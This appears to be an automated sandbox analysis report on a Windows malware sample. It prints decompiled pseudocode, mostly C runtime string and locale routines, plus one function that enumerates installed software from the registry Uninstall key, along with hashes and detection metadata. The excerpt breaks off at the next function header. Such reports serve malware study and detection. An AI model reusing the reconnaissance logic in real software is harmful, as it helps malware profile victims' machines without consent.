										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00446D30();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E00436F33(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00446D30();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00437E6C(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E0042A340(_t130);
													}
												}
											}
										}
									}
								}
								E0042A340(_t100);
							}
						}
					}
				}
				L63:
				return E004294CB(_v8 ^ _t132);
			}






































                                            0x004445f9
                                            0x00444600
                                            0x00444608
                                            0x0044460b
                                            0x00444611
                                            0x00444614
                                            0x00444617
                                            0x0044461b
                                            0x0044461e
                                            0x00444623
                                            0x0044464a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00444625
                                            0x0044462d
                                            0x0044462f
                                            0x00444633
                                            0x00444633
                                            0x00444638
                                            0x00444656
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0044463a
                                            0x00444643
                                            0x00444658
                                            0x00444658
                                            0x0044465d
                                            0x00444664
                                            0x00444667
                                            0x00444667
                                            0x0044466c
                                            0x00444678
                                            0x00444685
                                            0x00444692
                                            0x004446a5
                                            0x00000000
                                            0x004446a7
                                            0x004446a9
                                            0x004446dc
                                            0x00000000
                                            0x004446de
                                            0x004446e0
                                            0x004446e4
                                            0x004446ea
                                            0x004446ed
                                            0x004446ef
                                            0x004446f2
                                            0x004446f2
                                            0x004446f7
                                            0x00000000
                                            0x00000000
                                            0x004446f9
                                            0x004446fd
                                            0x00444707
                                            0x0044470c
                                            0x00000000
                                            0x0044470e
                                            0x00000000
                                            0x0044470e
                                            0x0044470c
                                            0x00000000
                                            0x004446fd
                                            0x004446f2
                                            0x004446ed
                                            0x00000000
                                            0x004446e4
                                            0x004446ab
                                            0x004446ad
                                            0x004446b1
                                            0x004446b7
                                            0x004446ba
                                            0x004446bc
                                            0x004446bc
                                            0x004446c1
                                            0x00000000
                                            0x00000000
                                            0x004446c3
                                            0x004446c7
                                            0x004446d1
                                            0x004446d6
                                            0x00000000
                                            0x004446d8
                                            0x00000000
                                            0x004446d8
                                            0x004446d6
                                            0x00000000
                                            0x004446c7
                                            0x004446bc
                                            0x004446ba
                                            0x00000000
                                            0x004446b1
                                            0x004446a9
                                            0x00444694
                                            0x00444694
                                            0x00444694
                                            0x00000000
                                            0x00444694
                                            0x00444687
                                            0x00444687
                                            0x00444689
                                            0x0044467a
                                            0x0044467a
                                            0x0044467c
                                            0x0044467c
                                            0x00444713
                                            0x00444713
                                            0x00444713
                                            0x00444720
                                            0x00444726
                                            0x0044472b
                                            0x0044464c
                                            0x00444731
                                            0x00444731
                                            0x00444739
                                            0x0044473d
                                            0x00444798
                                            0x0044479a
                                            0x00000000
                                            0x0044473f
                                            0x00444744
                                            0x00444746
                                            0x00444748
                                            0x00444750
                                            0x00444774
                                            0x00444779
                                            0x0044477e
                                            0x00444784
                                            0x00000000
                                            0x0044478a
                                            0x0044478a
                                            0x00000000
                                            0x0044478a
                                            0x00444752
                                            0x00444754
                                            0x00444758
                                            0x0044475d
                                            0x0044475f
                                            0x00444764
                                            0x00444879
                                            0x00444879
                                            0x0044476a
                                            0x0044476a
                                            0x00444790
                                            0x00444790
                                            0x00444793
                                            0x0044479d
                                            0x0044479f
                                            0x00000000
                                            0x004447a5
                                            0x004447ad
                                            0x004447bb
                                            0x00000000
                                            0x004447c1
                                            0x004447ca
                                            0x004447d0
                                            0x004447d5
                                            0x00000000
                                            0x004447db
                                            0x004447db
                                            0x004447de
                                            0x004447e3
                                            0x004447e7
                                            0x00444833
                                            0x00000000
                                            0x004447e9
                                            0x004447ee
                                            0x004447f0
                                            0x004447f2
                                            0x004447fa
                                            0x00444817
                                            0x00444821
                                            0x00444823
                                            0x00444826
                                            0x00000000
                                            0x00444828
                                            0x00444828
                                            0x00000000
                                            0x00444828
                                            0x004447fc
                                            0x004447fe
                                            0x00444802
                                            0x00444807
                                            0x0044480b
                                            0x0044486d
                                            0x0044486d
                                            0x0044480d
                                            0x0044480d
                                            0x0044482e
                                            0x0044482e
                                            0x00444835
                                            0x00444837
                                            0x00000000
                                            0x00444850
                                            0x00444850
                                            0x00444869
                                            0x00444869
                                            0x00444837
                                            0x0044480b
                                            0x004447fa
                                            0x00444871
                                            0x00444876
                                            0x004447d5
                                            0x004447bb
                                            0x0044479f
                                            0x00444764
                                            0x00444750
                                            0x0044487d
                                            0x00444883
                                            0x0044472b
                                            0x0044466c
                                            0x00444638
                                            0x00444885
                                            0x00444898

                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004448CA,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044469D
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004448CA,00000000,00000000,?,00000001,?,?,?,?), ref: 00444720
                                            • __alloca_probe_16.LIBCMT ref: 00444758
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004448CA,?,004448CA,00000000,00000000,?,00000001,?,?,?,?), ref: 004447B3
                                            • __alloca_probe_16.LIBCMT ref: 00444802
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004448CA,00000000,00000000,?,00000001,?,?,?,?), ref: 004447CA
                                              • Part of subcall function 00436F33: RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004448CA,00000000,00000000,?,00000001,?,?,?,?), ref: 00444846
                                            • __freea.LIBCMT ref: 00444871
                                            • __freea.LIBCMT ref: 0044487D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                            • String ID:
                                            • API String ID: 201697637-0
                                            • Opcode ID: 8a6092c6b1a1bd13dbfb09bde5a97202258dd9aca1a44bf8f9a76a0060f99484
                                            • Instruction ID: e552c08226407d63c937c02c9abe7d26ed9c92b7a54d7451feb1eca5cc1a0008
                                            • Opcode Fuzzy Hash: 8a6092c6b1a1bd13dbfb09bde5a97202258dd9aca1a44bf8f9a76a0060f99484
                                            • Instruction Fuzzy Hash: 9391C371E002569AFF209FA5CC81BEF7BB4AB8A354F19056AE801E7240D73DDC41CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004361A1, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E004361A1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x45f014; // 0x8d941b67
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00438D61(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E004358EB(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E00436F33(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0x996c
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E00437840(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E00430CA7();
									asm("int3");
									_t169 =  *0x4604f8; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E004355F8(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E0043EB9C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x44d338, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E0042CF8E( &_v528,  *0x45f170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x44d278; // 0x40a45c
									 *0x4493d4(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x45f2d8;
										if(_t228 != 0x45f2d8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E00437795( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E00437795( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0x996c
												E00437795( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0x996c
										E00437795( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E00437795(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E004294CB(_v8 ^ _t262);
				}
				L47:
			}

























































                                            0x004361a4
                                            0x004361ac
                                            0x004361b3
                                            0x004361b6
                                            0x004361b7
                                            0x004361ba
                                            0x004361be
                                            0x004361bf
                                            0x004361c2
                                            0x004361d2
                                            0x004361de
                                            0x004361f5
                                            0x004361fa
                                            0x004361ff
                                            0x00436214
                                            0x00436217
                                            0x00436217
                                            0x0043621a
                                            0x00436220
                                            0x00436229
                                            0x0043622b
                                            0x0043622e
                                            0x00436235
                                            0x00436238
                                            0x0043623e
                                            0x00000000
                                            0x00000000
                                            0x00436240
                                            0x00436244
                                            0x0043626d
                                            0x0043626d
                                            0x00436246
                                            0x00436246
                                            0x0043624a
                                            0x0043624e
                                            0x00436255
                                            0x0043625b
                                            0x00000000
                                            0x0043625d
                                            0x0043625d
                                            0x00436260
                                            0x00436263
                                            0x0043626b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043626b
                                            0x0043625b
                                            0x0043627a
                                            0x0043627a
                                            0x0043627c
                                            0x00436282
                                            0x00436288
                                            0x0043628b
                                            0x0043628b
                                            0x0043628e
                                            0x00436291
                                            0x00436291
                                            0x004362a1
                                            0x004362af
                                            0x004362b4
                                            0x004362bb
                                            0x004362bd
                                            0x00000000
                                            0x004362c3
                                            0x004362c9
                                            0x004362cf
                                            0x004362d6
                                            0x004362dc
                                            0x004362df
                                            0x004362e5
                                            0x004362f2
                                            0x004362f9
                                            0x004362fe
                                            0x00436301
                                            0x00436303
                                            0x0043655c
                                            0x00436562
                                            0x00436563
                                            0x00436564
                                            0x00436565
                                            0x00436566
                                            0x00436567
                                            0x0043656c
                                            0x0043656d
                                            0x00436572
                                            0x00436309
                                            0x00436309
                                            0x00436317
                                            0x0043631a
                                            0x00436335
                                            0x0043633c
                                            0x00436342
                                            0x00436348
                                            0x0043631c
                                            0x0043631c
                                            0x00436324
                                            0x00000000
                                            0x00436326
                                            0x00436326
                                            0x0043632c
                                            0x0043632c
                                            0x00436324
                                            0x0043634f
                                            0x00436352
                                            0x0043646f
                                            0x00436472
                                            0x0043647f
                                            0x00436482
                                            0x0043648a
                                            0x0043648a
                                            0x00436474
                                            0x0043647a
                                            0x0043647a
                                            0x00436358
                                            0x00436358
                                            0x0043635e
                                            0x00436366
                                            0x00436368
                                            0x0043636b
                                            0x00436374
                                            0x0043637d
                                            0x00436383
                                            0x00436383
                                            0x00436386
                                            0x00436388
                                            0x00000000
                                            0x00000000
                                            0x0043638a
                                            0x00436390
                                            0x00436391
                                            0x0043639c
                                            0x004363a4
                                            0x004363ac
                                            0x004363af
                                            0x004363b2
                                            0x004363b8
                                            0x004363be
                                            0x004363c4
                                            0x004363ca
                                            0x004363cd
                                            0x00000000
                                            0x00000000
                                            0x004363cf
                                            0x004363f4
                                            0x004363f4
                                            0x004363f7
                                            0x004363fb
                                            0x00436414
                                            0x00436419
                                            0x0043641c
                                            0x0043641e
                                            0x00436424
                                            0x0043645f
                                            0x00436426
                                            0x00436426
                                            0x0043642b
                                            0x00436433
                                            0x00436434
                                            0x00436434
                                            0x0043644b
                                            0x00436452
                                            0x00436455
                                            0x0043645a
                                            0x0043645a
                                            0x00436462
                                            0x00436465
                                            0x00436465
                                            0x0043646a
                                            0x00000000
                                            0x0043646a
                                            0x004363d1
                                            0x004363d3
                                            0x004363d8
                                            0x004363de
                                            0x004363e7
                                            0x004363f0
                                            0x004363f0
                                            0x00000000
                                            0x004363d3
                                            0x0043648d
                                            0x0043648d
                                            0x00436491
                                            0x00436499
                                            0x0043649f
                                            0x004364a2
                                            0x004364a8
                                            0x004364aa
                                            0x004364ea
                                            0x004364f0
                                            0x004364f7
                                            0x004364f7
                                            0x004364fd
                                            0x00436501
                                            0x00000000
                                            0x00436503
                                            0x00436503
                                            0x00436507
                                            0x0043650c
                                            0x00436510
                                            0x00436515
                                            0x0043651c
                                            0x0043652a
                                            0x00436530
                                            0x00436533
                                            0x00436533
                                            0x00436501
                                            0x00436542
                                            0x0043654a
                                            0x00436553
                                            0x004364ac
                                            0x004364b2
                                            0x004364b5
                                            0x004364bc
                                            0x004364ce
                                            0x004364d5
                                            0x004364e2
                                            0x00000000
                                            0x004364e2
                                            0x00000000
                                            0x004364aa
                                            0x00436303
                                            0x0043627e
                                            0x00000000
                                            0x0043627e
                                            0x00000000
                                            0x0043627c
                                            0x00436275
                                            0x00436277
                                            0x00436277
                                            0x00000000
                                            0x00436201
                                            0x00436201
                                            0x00436203
                                            0x00436213
                                            0x00436213
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                            • _memcmp.LIBVCRUNTIME ref: 0043644B
                                            • _free.LIBCMT ref: 004364BC
                                            • _free.LIBCMT ref: 004364D5
                                            • _free.LIBCMT ref: 00436507
                                            • _free.LIBCMT ref: 00436510
                                            • _free.LIBCMT ref: 0043651C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorLast$_abort_memcmp
                                            • String ID: C
                                            • API String ID: 1679612858-1037565863
                                            • Opcode ID: c97381789587498c46d27e9273569b483aeade0f058d457533948f23fd80bceb
                                            • Instruction ID: 1dda877769b0a0fed5608ff62c7d741b0ecc5cf960e71847ed1c39c30cc2d9c7
                                            • Opcode Fuzzy Hash: c97381789587498c46d27e9273569b483aeade0f058d457533948f23fd80bceb
                                            • Instruction Fuzzy Hash: B1B14C7590121AAFDB24DF18C884AAEB7B4FF18304F1185EEE949A7351D735AE90CF48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041175F, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 63%
                                            			E0041175F(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					E00405BA4(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E0040B82F( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E0040B82F( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E0040B82F( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E0040B82F( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E0040B82F( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E0040B82F( &_v88, _v8);
								__eflags = E00409BB9();
								if(__eflags == 0) {
									_t149 = "\t";
									E00405B9B(E00406D5F(_t129,  &_v208, E00406D5F(_t129,  &_v232, E004084E3(_t129,  &_v256, E00406D5F(_t129,  &_v280, E004084E3(_t129,  &_v304, E00406D5F(_t129,  &_v328, E004084E3(_t129,  &_v352, E00406D5F(_t129,  &_v376, E004084E3(_t129,  &_v400, E00406D5F(_t129,  &_v424, E004084E3(_t129,  &_v448, E0040590A( &_v472,  &_v40, __eflags, "\t"), __eflags,  &_v160), _t206, __eflags, _t149), __eflags,  &_v112), _t206, __eflags, _t149), __eflags,  &_v184), _t206, __eflags, _t149), __eflags,  &_v136), _t206, __eflags, _t149), __eflags,  &_v88), _t206, __eflags, _t149), _t206, __eflags, "\n"));
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
									E004031D1();
								}
								RegCloseKey(_v8);
								E004031D1();
								E004031D1();
								E004031D1();
								E004031D1();
								E004031D1();
								E004031D1();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E00405441(_t129, _t207, __eflags,  &_v64);
					E004031D1();
				} else {
					E004031DB(__ebx, _t207, 0x45595c);
				}
				return _t207;
			}
































                                            0x0041175f
                                            0x0041177f
                                            0x00411789
                                            0x0041179f
                                            0x004117a6
                                            0x004117a8
                                            0x004117b2
                                            0x004117b3
                                            0x004117b4
                                            0x004117b5
                                            0x004117b6
                                            0x004117bd
                                            0x004117be
                                            0x00411a32
                                            0x00411a35
                                            0x00411a3b
                                            0x00411a40
                                            0x00000000
                                            0x00000000
                                            0x004117c4
                                            0x004117c6
                                            0x00411a18
                                            0x00411a18
                                            0x00411a18
                                            0x00411a19
                                            0x004117cc
                                            0x004117e1
                                            0x004117e7
                                            0x004117e9
                                            0x004117fa
                                            0x00411808
                                            0x0041180f
                                            0x0041181d
                                            0x00411824
                                            0x00411832
                                            0x00411839
                                            0x00411844
                                            0x0041184b
                                            0x00411856
                                            0x0041185d
                                            0x0041186b
                                            0x0041186d
                                            0x00411878
                                            0x0041194d
                                            0x00411958
                                            0x00411963
                                            0x0041196e
                                            0x00411979
                                            0x00411984
                                            0x0041198f
                                            0x0041199a
                                            0x004119a5
                                            0x004119b0
                                            0x004119bb
                                            0x004119c6
                                            0x004119d1
                                            0x004119d1
                                            0x004119d9
                                            0x004119e2
                                            0x004119ea
                                            0x004119f5
                                            0x00411a00
                                            0x00411a0b
                                            0x00411a13
                                            0x00000000
                                            0x00411a13
                                            0x004117e9
                                            0x00411a20
                                            0x00411a22
                                            0x00411a23
                                            0x00411a24
                                            0x00411a25
                                            0x00411a29
                                            0x00411a30
                                            0x00411a31
                                            0x00411a31
                                            0x00411a49
                                            0x00411a55
                                            0x00411a5d
                                            0x0041178b
                                            0x00411792
                                            0x00411792
                                            0x00411a69

                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00411781
                                            • RegEnumKeyExA.ADVAPI32 ref: 00411A35
                                            • RegCloseKey.ADVAPI32(?), ref: 00411A49
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00411775
                                            • DisplayName, xrefs: 004117F5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnumOpen
                                            • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                            • API String ID: 1332880857-3614651759
                                            • Opcode ID: 163bacdb10abfd1dbd9681e851efd4334706ae70cc00f2d77527e475da16e3af
                                            • Instruction ID: a09869e91bffd81271e07fc4d363e73b1ba2f87e5804b8bae9210c35153f5d15
                                            • Opcode Fuzzy Hash: 163bacdb10abfd1dbd9681e851efd4334706ae70cc00f2d77527e475da16e3af
                                            • Instruction Fuzzy Hash: 72812F31A00018ABDB14EB61DD62AEEB778EF15305F1041BFE50A761A1EF346F89CE58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040E77E, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
